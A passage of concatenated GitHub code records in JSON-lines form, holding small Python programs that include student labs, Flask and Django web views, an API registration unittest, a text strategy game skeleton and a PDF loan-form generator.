Texas has a population of', texas_population)\n\n\nclass Numbers_file():\n\n def __init__(self, file_name):\n self.file_total = 0.0\n self.file_name = file_name\n\n print('Processing file:', file_name)\n\n if self.process_file():\n print('The values in the file', self.file_name,\n 'add up to:', format(self.file_total, ',.2f'))\n\n def process_file(self):\n try:\n infile = open(self.file_name)\n except:\n print('A read error occured on file:', self.file_name)\n\n return False\n else:\n for line_number, line in enumerate(infile):\n try:\n amount = float(line)\n except:\n print('Non-numeric data found in file:',\n self.file_name, 'at line:', line_number + 1,\n 'with input:', line)\n\n return False\n else:\n self.file_total += amount\n\n infile.close()\n\n return True\n\n @classmethod\n def from_input(cls):\n \"\"\"Prompts the user for the info needed to create class instances\"\"\"\n class_instances = []\n\n while True:\n file_name = input(\n 'Enter file name without .txt extension. (enter nothing ' +\n 'to quit): ')\n\n if file_name:\n file_name += '.txt'\n class_instances.append(cls(file_name))\n else:\n break\n\n return class_instances\n\n\ndef choice_list():\n print('Hello. This is COSC1336 lab 6 on files.')\n while True:\n option = input(\n 'Enter choice: 1)Prime Table 2)Census Stats 3)Total of ' +\n 'files 4,q)uit? ')\n if option is '1':\n how_many_primes()\n elif option is '2':\n # Creates a throw away instance of the Census class\n Census('StateCensus2010.txt')\n elif option is '3':\n number_files = Numbers_file.from_input()\n elif option in ['4', 'q', 'Q', 'quit']:\n break\n else:\n print(' Invalid option, please try again.')\n print('\\nGoodbye')\n\n\nif __name__ == \"__main__\":\n choice_list()\n\n# Test output below\n# (env) chandler@chandler-G551JM:~/ACC/programming_fundamentals_1/labs/files_L6$ python TT18_L6_Wilson.py\n# Hello. This is COSC1336 lab 6 on files.\n# Enter choice: 1)Prime Table 2)Census Stats 3)Total of files 4,q)uit? 2\n# California has the highest population\n# Vermont has the lowest population\n# The average state's population is 6,181,560\n# The state of Texas has a population of 25,268,418\n# Enter choice: 1)Prime Table 2)Census Stats 3)Total of files 4,q)uit? 3\n# Enter file name without .txt extension. (enter nothing to quit): data1\n# Processing file: data1.txt\n# The values in the file data1.txt add up to: 6,600.66\n# Enter file name without .txt extension. (enter nothing to quit): data2\n# Processing file: data2.txt\n# Non-numeric data found in file: data2.txt at line: 3 with input: three hundred\n\n# Enter file name without .txt extension. (enter nothing to quit): data3\n# Processing file: data3.txt\n# A read error occured on file: data3.txt\n# Enter file name without .txt extension. (enter nothing to quit):\n# Enter choice: 1)Prime Table 2)Census Stats 3)Total of files 4,q)uit? 4\n\n# Goodbye\n","repo_name":"Chandler9Wilson/programming_fundamentals_1","sub_path":"labs/files_L6/TT18_L6_Wilson.py","file_name":"TT18_L6_Wilson.py","file_ext":"py","file_size_in_byte":8637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26658985388","text":"name=input('Qual o seu nome: ')\nprint ('Seja Bem vindo',name)\n\nday=input('Que dia você nasceu: ')\nmonth= input('Que mÊs você nasceu: ')\nyear= input('Em que ano você nasceu: ')\nprint('Você nasceu no dia', day,'/',month,'/',year)\n\nnumber1 =float(input('Digite um numero: '))\nnumber2 =float(input('Digite mais um numero: '))\nprint(number1 + number2)\n","repo_name":"Lucas-Melo-A-S/Curso_em_Video-Python","sub_path":"Pacote Resoluções/Python 2021/Desafio 01 e 02.py","file_name":"Desafio 01 e 02.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26367004682","text":"from typing import Dict, Optional\n\nfrom flask import Flask, render_template, url_for\nfrom flask_admin import Admin\nfrom flask_admin.menu import MenuLink\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\ndb = SQLAlchemy()\nmigrate = Migrate()\nlogin_manager = LoginManager()\nadmin = Admin(name='Адвокат', template_mode='bootstrap4')\n\n\ndef create_app(config, test_config: Optional[Dict] = None):\n app = Flask(\n __name__,\n static_url_path='',\n static_folder='frontend/static',\n template_folder='frontend/templates',\n )\n app.config.from_object(config)\n if test_config is not None:\n app.config.update(test_config)\n\n register_extensions(app)\n register_commands(app)\n register_blueprints(app)\n register_handlers(app)\n register_routers(app)\n register_shell_context(app)\n\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n\n login_manager.login_view = 'auth.login_get_view'\n login_manager.login_message = 'Пожалуйста, войдите, чтобы получить доступ к странице'\n login_manager.session_protection = 'strong'\n login_manager.init_app(app)\n\n migrate.init_app(app, db)\n from .admin_panel import initialize_admin\n initialize_admin(app, db)\n from .admin_panel.user import UserModelView\n from .admin_panel.login import LoginLink\n from .models import User\n\ndef register_commands(app):\n pass\n\n\ndef register_blueprints(app):\n from .auth import auth_bp\n app.register_blueprint(auth_bp)\n\n\ndef register_handlers(app):\n pass\n\n\ndef register_routers(app):\n @app.get('/')\n def index_view():\n \"\"\"Главная страница\"\"\"\n return render_template(\n 'app/public/index.html',\n title='Главная',\n )\n\n\ndef register_shell_context(app):\n \"\"\"Регистрация моделей для использования в Flask shell\"\"\"\n from .models import User\n\n def shell_context():\n return {\n 'db': db,\n 'User': User,\n }\n\n app.shell_context_processor(shell_context)\n","repo_name":"andy-takker/personal_blog","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36076471014","text":"# St. apl: 171REB171\ng = 9.81\nv0 = (1+1)*10\nf = open('P08s3.dat','w')\nfor t in range(1+10):\n y = v0*t-(g*t**2)/2\n string = str(t)+' '+str(y)\n print(string)\n f.write(string+'\\n')\n\nfrom numpy import linspace, array\nt = linspace(0,1+10,12)\ny = v0*t-(g*t**2)/2\n\nfrom matplotlib import pyplot as p\np.plot(t,y,color=\"#ff00ff\",label=\"bumbas pozicija\")\np.legend()\np.show()\n","repo_name":"x171REB171/P08","sub_path":"P08s3.py","file_name":"P08s3.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31867758779","text":"import os\nimport unittest\n\nimport requests\nimport csv\n\n\nclass test_register(unittest.TestCase):\n def setUp(self) -> None:\n path = os.getcwd()\n self.p2 = os.path.abspath(os.path.dirname(path) + os.path.sep + \"..\")\n path1 = self.p2 + \"\\\\testdatefile\\ind_interfile\\\\register.csv\"\n self.file = open(path1, 'r')\n path2 = self.p2 + \"\\\\testdatefile\\ind_interfile\\\\register_restule.csv\"\n self.file2 = open(path2, 'w')\n self.url = \"http://129.211.129.101:9006/user/register.do\"\n\n def test_case(self):\n table = csv.reader(self.file)\n userinfo = {}\n for ray in table:\n userinfo[\"username\"] = ray[0]\n userinfo[\"password\"] = ray[1]\n userinfo[\"email\"] = ray[2]\n userinfo[\"phone\"] = ray[3]\n userinfo[\"question\"] = ray[4]\n userinfo[\"answer\"] = ray[5]\n\n respones = requests.post(self.url, data=userinfo).text\n print(respones)\n print(userinfo)\n msg = respones.find(ray[6])\n if msg > 0:\n print(\"接口测试通过\")\n self.file2.write(ray[0] + \",\" + ray[1] + \",\" + ray[2] + \",\" + ray[3] + ','\n + ray[4] + ',' + ray[5] + ',' + ray[6] + ',' + \"测试通过\" + \"\\n\")\n else:\n print(\"接口测试不通过\")\n self.file2.write(ray[0] + \",\" + ray[1] + \",\" + ray[2] + \",\" + ray[3] + ','\n + ray[4] + ',' + ray[5] + ',' + ray[6] + ',' + \"测试不通过\" + \"\\n\")\n self.file2.close()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Albertay1/interfcaeframwork","sub_path":"script/ind_interface/registertest.py","file_name":"registertest.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71844370089","text":"#!/usr/bin/env python3\n\nfrom os import getenv, sep\nfrom sys import stderr, version_info\n\ntry:\n from dearpygui import dearpygui\nexcept ImportError:\n base = sep.join(getenv(\"__PYVENV_LAUNCHER__\", \"\").split(sep)[:-1]) + sep\n stderr.write(\"\\ndearpygui module missing. Please install using\\n\")\n stderr.write(f\"sudo -H {base}pip{version_info.major}.{version_info.minor}\")\n stderr.write(\" install dearpygui\\n\\n\")\n exit()\nfrom random import randint\n\nfrom paravia_player import Player\n\n\nclass SantaParavia: # pylint: disable=too-many-ancestors\n def __init__(self):\n self.players = []\n self.Peppone = Player(\"Peppone\", 6)\n self.name = \"Santa Paravia And Fiumaccio\"\n\n @staticmethod\n def Instructions():\n msg = [\" You are the ruler of a 15th century Italian city-state.\"]\n msg.append(\"If you rule well, you will receive higher titles. The\")\n msg.append(\n \"first player to become a king or queen wins. Life expectancy\"\n )\n msg.append(\"then was brief, so you may not live long enough to win.\")\n msg.append(\" The computer will draw a map of your state. The size\")\n msg.append(\"of the area in the wall grows as you buy more land. The\")\n msg.append(\"size of the guard tower in the upper left corner shows\")\n msg.append(\"the adequacy of your defenses. If it shrinks, equip more\")\n msg.append(\n \"soldiers! If the horse and plowman is touching the top wall,\"\n )\n msg.append(\"all your land is in production. Otherwise you need more\")\n msg.append(\"serfs, who will migrate to your state if you distribute\")\n msg.append(\n \"more grain than the minimum demand. If you distribute less\"\n )\n msg.append(\"grain, some of your people will starve, and you will have\")\n msg.append(\"a high death rate. High taxes raise money, but slow down\")\n msg.append(\"economic growth.\")\n return \" \".join(msg)\n\n def Comparison(self, msg=\"\"):\n for player in self.players:\n # Display comparison table\n # Player title/name, nobles, soldiers, clergy, merchants, serfs, land, treasury\n pass\n\n @staticmethod\n def Obituary(player):\n player.IsDead = True\n msg = \"Very sad news.\\n\\n%s %s of %s has just died \" % (\n player.Title,\n player.Name,\n player.City,\n )\n if player.Year > 1450:\n msg += \"of old age after a long reign.\"\n return msg\n reason = randint(0, 8)\n if reason < 4:\n msg += \"of pneumonia after a cold winter in a drafty castle.\"\n elif reason == 5:\n msg += \"in a smallpox epidemic.\"\n elif reason == 4:\n msg += \"of typhoid after drinking contaminated water.\"\n elif reason == 6:\n msg += \"after being attacked by robbers while traveling.\"\n else:\n msg += \"of food poinoning.\"\n return msg\n\n @staticmethod\n def Born(player):\n serfs = int((randint(0, player.Marketplaces) * player.Serfs) / 100)\n player.Serfs += serfs\n return serfs\n\n @staticmethod\n def Die(player):\n serfs = int((randint(0, player.Marketplaces) * player.Serfs) / 100)\n player.Serfs -= serfs\n return serfs\n\n def Invasion(self, player):\n for other in self.players:\n if other.WhichPlayer == player.WhichPlayer:\n # Attacking ourselves would be silly.\n continue\n if other.Soldiers < player.Soldiers:\n # Don't attack someone stronger\n continue\n if other.Soldiers < int(1.2 * (float(player.Land) / 1000.0)):\n # Don't attack if we can't take land.\n continue\n if other.Soldiers > player.Soldiers:\n return other.AttackNeighbor(player)\n # Nobody was strong enough to attack. Use Peppone\n return self.Peppone.AttackNeighbor(player)\n\n def ControlLoop(self):\n for player in self.players:\n player.Year += 1\n player.GenerateHaravest()\n player.NewLandAndGrainPrices()\n player.GenerateIncome()\n # Buy and Sell grain and land\n howMuch: int = 1999\n player.ReleaseGrain(howMuch)\n if player.InvadeMe:\n self.Invasion(player)\n # Adjust taxes and justice\n player.AddRevenue()\n if player.IsBankrupt:\n player.SeizeAssets()\n # Display map\n # Buy mills, markets, etc.\n if player.Year >= player.YearOfDeath:\n self.Comparison(self.Obituary(player))\n self.players.remove(player)\n continue\n player.CheckNewTitle()\n if player.TitleNum >= 7:\n self.Comparison()\n # Yay, I won!\n break\n\n\nif __name__ == \"__main__\":\n version = dearpygui.get_dearpygui_version().split(\".\")\n if \"b\" in version[-1]:\n point = version[-1].split(\"b\")[0]\n beta = version[-1].split(\"b\")[1]\n version[-1] = point\n version.append(beta)\n version = [int(i) for i in version]\n print(f\"Running dearpygui version {dearpygui.get_dearpygui_version()}\")\n vlen = len(version) - 1\n tot = 0\n for i in version:\n tot += i * (10**vlen)\n vlen -= 1\n if tot < 112:\n stderr.write(\"\\ndearpygui version too old.\\n\")\n exit()\n","repo_name":"DNSGeek/Santa-Paravia","sub_path":"santa_paravia.py","file_name":"santa_paravia.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39963437623","text":"#!/usr/bin/python3\n\"\"\"\ncategory.py\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, make_response, request\nfrom models import storage\nfrom models.category import Category\n\n\n@app_views.route('/categories', methods=['GET'], strict_slashes=False)\ndef get_categories():\n \"\"\"get category information for all categories\"\"\"\n catlist = []\n for category in storage.all(\"Category\").values():\n catlist.append(category.to_dict())\n return jsonify(catlist)\n\n\n@app_views.route('/categories/', methods=['GET'],\n strict_slashes=False)\ndef get_category(category_id):\n \"\"\"get category information for specified category\"\"\"\n category = storage.get(\"Category\", category_id)\n if category is None:\n abort(404)\n return jsonify(category.to_dict())\n\n\n@app_views.route('/categories/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_category(category_id):\n \"\"\"deletes a category based on its category_id\"\"\"\n category = storage.get(\"Category\", category_id)\n if category is None:\n abort(404)\n category.delete()\n storage.save()\n return (jsonify({}))\n\n\n@app_views.route('/categories', methods=['POST'], strict_slashes=False)\ndef post_category():\n \"\"\"create a new category\"\"\"\n if not request.get_json():\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n if 'label' not in request.get_json():\n return make_response(jsonify({'error': 'Missing label'}), 400)\n category = category(**request.get_json())\n category.save()\n return make_response(jsonify(category.to_dict()), 201)\n\n\n@app_views.route('/categories/', methods=['PUT'],\n strict_slashes=False)\ndef put_category(category_id):\n \"\"\"update an category\"\"\"\n category = storage.get(\"Category\", category_id)\n if category is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n for attr, val in request.get_json().items():\n if attr not in ['id', 'created_at', 'updated_at']:\n setattr(category, attr, val)\n category.save()\n return jsonify(category.to_dict())\n","repo_name":"medcharfi96/craftiny_v1","sub_path":"api/v1/views/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74264936166","text":"import sweetify\n\nfrom django.conf import settings\nfrom django.db import transaction, DatabaseError\nfrom django.shortcuts import render\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.http import JsonResponse\n\nfrom nolsatu_courses.apps import utils\nfrom nolsatu_courses.apps.courses.models import Enrollment, Batch\nfrom nolsatu_courses.apps.decorators import superuser_required\nfrom django.contrib.auth.decorators import login_required\nfrom nolsatu_courses.apps.utils import call_internal_api\nfrom .forms import FormFilterStudent\nfrom ...apps.accounts.models import MemberNolsatu\n\n\n@superuser_required\ndef index(request):\n graduates = []\n form = FormFilterStudent(request.GET or None)\n if form.is_valid():\n graduates = form.get_data(status=Enrollment.STATUS.graduate)\n\n context = {\n 'menu_active': 'graduate',\n 'title': _('Lulusan'),\n 'graduates': graduates,\n 'form': form\n }\n return render(request, 'backoffice/graduates/index.html', context)\n\n\n@superuser_required\ndef candidate(request):\n candidate = []\n form = FormFilterStudent(request.GET or None)\n if form.is_valid():\n students = form.get_data(status=Enrollment.STATUS.finish)\n candidate = [\n {\n 'enroll': student,\n 'task': student.get_count_task_status()\n } for student in students\n ]\n\n context = {\n 'menu_active': 'graduate',\n 'title': _('Kandidat'),\n 'candidate': candidate,\n 'form': form\n }\n return render(request, 'backoffice/graduates/candidate.html', context)\n\n\n@superuser_required\ndef candidate_to_graduate(request, id):\n enroll = get_object_or_404(Enrollment, id=id)\n enroll.note = request.GET.get('note', \"\")\n enroll.final_score = request.GET.get('final_score', 0)\n enroll.status = Enrollment.STATUS.graduate\n\n msg = ('Selamat, Anda telah berhasil menyelesaikan persyaratan yang diperlukan untuk mendapatkan '\n f'Sertifikasi kelulusan pada kelas {enroll.course.title}. ')\n\n if request.GET.get('print_certificate'):\n data = enroll.get_cert_data()\n response = call_internal_api('post', url=settings.NOLSATU_HOST + '/api/internal/generate-certificate/',\n data=data)\n if response.status_code == 200:\n msg = ('Selamat, Anda telah berhasil menyelesaikan persyaratan yang diperlukan untuk mendapatkan '\n f'Sertifikasi kelulusan pada kelas {enroll.course.title}. '\n 'Silahkan cek sertifikat Anda dimenu Sertifikat pada halaman akun.')\n else:\n sweetify.error(request, f'Gagal cetak sertifikat milik {enroll.user.get_full_name()}', button='OK',\n icon='error')\n\n try:\n with transaction.atomic():\n enroll.save()\n except DatabaseError:\n return redirect('backoffice:graduates:candidate')\n\n utils.send_notification(enroll.user, 'Selamat! Anda lulus', msg)\n\n sweetify.success(request, f'Berhasil mengubah status {enroll.user.get_full_name()} menjadi lulusan',\n button='OK', icon='success')\n\n if request.is_ajax():\n data = {\n 'message': _(\"Berhasil set lulus\")\n }\n return JsonResponse(data, status=200)\n\n return redirect('backoffice:graduates:candidate')\n\n\n@superuser_required\ndef regenerate_certificate(request, user_id):\n response = call_internal_api('get', url=settings.NOLSATU_HOST + f'/api/internal/regenerate-certificate/{user_id}')\n if response.status_code == 200:\n sweetify.success(request, 'Berhasil perbarui sertifikat', button='OK', icon='success')\n else:\n sweetify.error(request, 'Gagal perbarui sertifikat', button='OK', icon='error')\n\n return redirect('backoffice:graduates:index')\n\n\n@login_required\ndef ajax_filter_batch(request):\n \"\"\" a view ajax filter used to filtering batch by course\n ...\n Ajax Filter batch by condition user role\n ----------------------------------------\n - backoffice: all batch\n - vendor: batch in course filter by vendor\n - trainer: batch have assigned to teachers\n \"\"\"\n\n course = request.GET.get('course', None)\n\n data = {\n 'batch': []\n }\n\n if course:\n if request.user.nolsatu.role == MemberNolsatu.ROLE.vendor:\n batch = Batch.objects.filter(course=course, course__vendor__user__email=request.user.email)\n elif request.user.nolsatu.role == MemberNolsatu.ROLE.trainer:\n batch = Batch.objects.filter(course=course, teaches__user__email=request.user.email)\n else:\n batch = Batch.objects.filter(course=course)\n\n data['batch'] = [\n {\n 'id': b.id,\n 'batch': b.batch\n } for b in batch\n ]\n\n return JsonResponse(data, status=200)\n","repo_name":"nolsatuid/courses","sub_path":"nolsatu_courses/backoffice/graduates/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7565120561","text":"#\r\n#Name: Nathan Diekema\r\n#Student ID:\r\n#Date: 1/13/18\r\n#\r\n#Lab 2\r\n#Section 202-05\r\n#Purpose of Lab: Recursion vs Iteration\r\n#\r\n\r\n\r\n#This function will return the largest of a list of numbers\r\n#list -> int\r\ndef max_list_iter(int_list): # must use iteration not recursion\r\n \"\"\"finds the max of a list of numbers and returns the value (not the index)\r\n If int_list is empty, returns None. If list is None, raises ValueError\"\"\"\r\n if int_list == None:\r\n raise ValueError\r\n if len(int_list) == 0:\r\n return None\r\n\r\n maxNum = int_list[0]\r\n for x in int_list:\r\n if x > maxNum:\r\n maxNum = x\r\n return maxNum\r\n\r\n#This function will reverse the order of a list\r\n#list -> list\r\ndef reverse_rec(int_list): # must use recursion\r\n \"\"\"recursively reverses a list of numbers and returns the reversed list\r\n If list is None, raises ValueError\"\"\"\r\n if len(int_list) == 0:\r\n raise ValueError\r\n\r\n return helper(int_list)\r\n\r\ndef helper(lst):\r\n if len(lst) == 0 or len(lst) == 1:\r\n return lst\r\n return (helper(lst[1:]) + [lst[0]])\r\n\r\n\r\n#This function will use binary search to return the index of a target number\r\n#int int int list -> int\r\ndef bin_search(target, low, high, int_list): # must use recursion\r\n \"\"\"searches for target in int_list[low..high] and returns index if found\r\n If target is not found returns None. If list is None, raises ValueError \"\"\"\r\n \r\n if len(int_list) == 0:\r\n raise ValueError\r\n else: \r\n midpoint = ((high+low)//2)\r\n if midpoint == high == low and int_list[midpoint] != target:\r\n return None\r\n #print(\"NOW\", int_list[low], int_list[high], target)\r\n if target == int_list[midpoint]:\r\n return midpoint\r\n elif target > int_list[midpoint]:\r\n return bin_search(target,midpoint+1,high,int_list)\r\n elif target < int_list[midpoint]:\r\n return bin_search(target,low,midpoint-1,int_list)","repo_name":"ndiekema/CPE202","sub_path":"Labs/lab1/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29990945884","text":"import os\n\nfrom django.utils import formats\n\nimport fpdf\nfrom api.models import CheckOutProcess, Item\n\nfrom tinventory.settings import BASE_DIR\n\nTEMP_DIR = \"tmp\"\nFONTS_DIR = \"fonts\"\n\nfpdf.FPDF_FONT_DIR = os.path.join(BASE_DIR, FONTS_DIR)\nfpdf.set_global(\"FPDF_FONT_DIR\", os.path.join(BASE_DIR, FONTS_DIR))\nprint(fpdf.FPDF_FONT_DIR)\nFPDF_FONT_DIR = os.path.join(BASE_DIR, FONTS_DIR)\n\n\nclass Report(fpdf.FPDF):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.add_font(\"Roboto Condensed\", fname=\"RobotoCondensed-Regular.ttf\", uni=True)\n self.add_font(\n \"Roboto Condensed Bold\", fname=\"RobotoCondensed-Bold.ttf\", uni=True\n )\n self.add_font(\n \"Roboto Condensed Light\", fname=\"RobotoCondensed-Light.ttf\", uni=True\n )\n self.add_font(\"mono\", fname=\"RobotoMono-Regular.ttf\", uni=True)\n self.add_font(\"line\", fname=\"Montserrat-Regular.ttf\", uni=True)\n self.add_font(\"code39\", fname=\"code39.ttf\", uni=True)\n self.add_font(\"code39-s\", fname=\"code39_S.ttf\", uni=True)\n\n print(\"RobotoMono-Regular.ttf\")\n\n def heading(self):\n self.normal_font()\n self.image(os.path.join(BASE_DIR, \"logo.png\"), h=20)\n # self.cell(w=0, h=1, ln=1)\n\n def normal_font(self, size=14):\n self.set_font(\"Roboto Condensed\", size=size)\n\n def mono_font(self, size=14):\n self.set_font(\"mono\", size=size)\n\n def small_font(self):\n self.set_font(\"Roboto Condensed Light\", size=9)\n\n def barcode_font(self, size=23):\n self.set_font(\"code39\", size=size)\n\n def barcode_font_small(self, size=15):\n self.set_font(\"code39-s\", size=size)\n\n def normal_color(self):\n self.set_text_color(0, 0, 0)\n\n def dark_grey_color(self):\n self.set_text_color(66, 66, 66)\n\n def save_in_tmp(self, filename):\n filename = os.path.join(BASE_DIR, TEMP_DIR, filename)\n self.output(filename, \"F\")\n return filename\n\n\ndef barcode_pdf(item: Item):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=(54, 17))\n pdf.add_page()\n pdf.set_font(\"Roboto Condensed\", size=6)\n pdf.text(3, 3, \"Eigentum der Technik-AG, Katharineum zu Lübeck\")\n pdf.barcode_font()\n pdf.text(3, 12, txt=\"*{}*\".format(item.barcode))\n pdf.set_font(\"Roboto Condensed\", size=6)\n pdf.set_fill_color(255, 255, 255)\n pdf.rect(0, 13, 54, 4, style=\"F\")\n pdf.text(3, 15, \"ID: {}\".format(item.id))\n\n return pdf.save_in_tmp(\"barcode-{}.pdf\".format(item.id))\n\n\ndef loan_form_pdf(process: CheckOutProcess):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\n for i in range(2):\n pdf.add_page()\n pdf.heading()\n\n pdf.set_font(\"Roboto Condensed\", size=15)\n pdf.dark_grey_color()\n if i == 0:\n txt = \"AUSFERTIGUNG FÜR DIE TECHNIK-AG\"\n x = 120\n else:\n txt = \"AUSFERTIGUNG FÜR DEN AUSLEIHENDEN\"\n x = 110\n pdf.text(x=x, y=20, txt=txt)\n\n pdf.set_font(\"Roboto Condensed Bold\", size=20)\n pdf.normal_color()\n pdf.cell(w=0, h=30, txt=\"Ausleihformular der Technik-AG\", align=\"C\", ln=1)\n\n pdf.mono_font()\n pdf.cell(w=55, txt=process.borrowing_person.name)\n\n pdf.normal_font()\n pdf.cell(w=17, txt=\" hat am \")\n\n pdf.mono_font()\n pdf.cell(w=35, txt=formats.date_format(process.checked_out_at, \"d.m.Y\"))\n\n pdf.normal_font()\n pdf.cell(\n w=9,\n txt=\" bei \",\n )\n\n pdf.mono_font()\n pdf.cell(w=55, txt=process.lending_user.get_full_name(), ln=1)\n\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=55, txt=\"Name des Ausleihenden\")\n pdf.cell(w=17)\n pdf.cell(w=35, txt=\"Datum\")\n pdf.cell(w=9)\n pdf.cell(w=55, txt=\"Name des Technik-AG-Mitglieds\", ln=1)\n pdf.cell(w=0, h=8, ln=1)\n\n pdf.normal_font()\n pdf.cell(w=0, txt=\"folgendes ausgeliehen:\", ln=1)\n pdf.cell(w=0, h=8, ln=1)\n\n for check in process.checks.all():\n\n if check.item.preset:\n txt = \"- {} ({}, {})\".format(\n check.item.name, check.item.preset.name, check.item.barcode\n )\n else:\n txt = \"- {} ({})\".format(check.item.name, check.item.barcode)\n pdf.mono_font()\n pdf.cell(w=0, h=8, txt=txt, ln=1)\n\n # pdf.barcode_font_small(size=15)\n # pdf.cell(w=10, h=8, txt=\"*{}*\".format(check.item.barcode), ln=1)\n\n pdf.cell(w=0, h=5, ln=1)\n pdf.normal_font()\n pdf.multi_cell(w=0, h=7, txt=process.condition.text)\n\n if process.check_in_until is not None:\n pdf.cell(w=0, h=2, ln=1)\n pdf.cell(w=60, h=7, txt=\"Vereinbartes Rückgabedatum: \")\n pdf.mono_font()\n pdf.cell(\n w=35,\n h=7,\n txt=formats.date_format(process.check_in_until, \"d.m.Y\"),\n ln=1,\n )\n pdf.cell(w=0, h=20, ln=1)\n\n pdf.set_font(\"line\", size=12)\n pdf.cell(w=50, txt=\"________________________________\")\n pdf.cell(w=65)\n pdf.cell(w=50, txt=\"________________________________\", ln=1)\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=50, txt=\"Unterschrift des Ausleihenden\")\n pdf.cell(w=65)\n pdf.cell(w=30, txt=\"Unterschrift des Technik-AG-Mitglieds\", ln=1)\n\n pdf.text(\n x=10,\n y=285,\n txt=\"Ausleihvorgang {}–{} #{}\".format(\n process.borrowing_person.name, process.checked_out_at, process.id\n ),\n )\n\n pdf.barcode_font(30)\n pdf.text(x=150, y=287, txt=\"*{}*\".format(process.id))\n\n return pdf.save_in_tmp(\"loan-form-{}.pdf\".format(process.id))\n\n\ndef check_in_confirmation_pdf(process):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\n for i in range(2):\n pdf.add_page()\n pdf.heading()\n\n pdf.set_font(\"Roboto Condensed\", size=15)\n pdf.dark_grey_color()\n if i == 0:\n txt = \"AUSFERTIGUNG FÜR DIE TECHNIK-AG\"\n x = 120\n else:\n txt = \"AUSFERTIGUNG FÜR DEN AUSLEIHENDEN\"\n x = 110\n pdf.text(x=x, y=20, txt=txt)\n\n pdf.set_font(\"Roboto Condensed Bold\", size=20)\n pdf.normal_color()\n pdf.cell(w=0, h=30, txt=\"Rückgabebestätigung\", align=\"C\", ln=1)\n\n pdf.mono_font()\n pdf.cell(w=55, txt=process.borrowing_person.name)\n\n pdf.normal_font()\n pdf.cell(w=17, txt=\" hat folgendes zurückgegeben:\")\n\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=55, txt=\"Name des Ausleihenden\")\n\n pdf.cell(w=0, h=8, ln=1)\n\n for check in process.checks.all().filter(checked_in=True):\n pdf.normal_font()\n pdf.cell(w=3, txt=\"-\")\n pdf.mono_font()\n if check.item.preset:\n txt = \"{} ({}, {})\".format(\n check.item.name, check.item.preset.name, check.item.barcode\n )\n else:\n txt = \"{} ({})\".format(check.item.name, check.item.barcode)\n print(len(txt))\n if len(txt) > 30:\n pdf.cell(w=0, txt=txt, ln=1)\n pdf.cell(w=0, h=5, ln=1)\n pdf.cell(w=93)\n else:\n pdf.cell(w=90, txt=txt)\n\n pdf.normal_font(10)\n pdf.cell(w=8, txt=\" am \")\n\n pdf.mono_font(12)\n pdf.cell(w=30, txt=formats.date_format(check.checked_in_at, \"d.m.Y\"))\n\n pdf.normal_font(10)\n pdf.cell(\n w=7,\n txt=\" bei \",\n )\n\n pdf.mono_font(12)\n pdf.cell(w=55, txt=check.checked_in_by.get_full_name(), ln=1)\n\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=101)\n\n pdf.cell(w=30, txt=\"Datum\")\n pdf.cell(w=7)\n pdf.cell(w=55, txt=\"Name des Technik-AG-Mitglieds\", ln=1)\n pdf.cell(w=0, h=10, ln=1)\n pdf.cell(w=0, h=20, ln=1)\n\n pdf.set_font(\"line\", size=12)\n pdf.cell(w=50, txt=\"________________________________\")\n pdf.cell(w=65)\n pdf.cell(w=50, txt=\"________________________________\", ln=1)\n pdf.cell(w=0, h=5, ln=1)\n\n pdf.small_font()\n pdf.cell(w=50, txt=\"Unterschrift des Ausleihenden\")\n pdf.cell(w=65)\n pdf.cell(w=50, txt=\"Unterschrift des Technik-AG-Mitglieds\", ln=1)\n\n pdf.text(\n x=10,\n y=285,\n txt=\"Ausleihvorgang {}–{} #{}\".format(\n process.borrowing_person.name, process.checked_out_at, process.id\n ),\n )\n\n pdf.barcode_font(30)\n pdf.text(x=150, y=287, txt=\"*{}*\".format(process.id))\n\n return pdf.save_in_tmp(\"check-in-{}.pdf\".format(process.id))\n\n\ndef excuse_form_pdf(technician, date, start, stop, reason):\n pdf = Report(orientation=\"P\", unit=\"mm\", format=\"A4\")\n\n pdf.add_page()\n pdf.heading()\n\n pdf.set_font(\"Roboto Condensed Bold\", size=20)\n pdf.normal_color()\n pdf.cell(w=0, h=30, 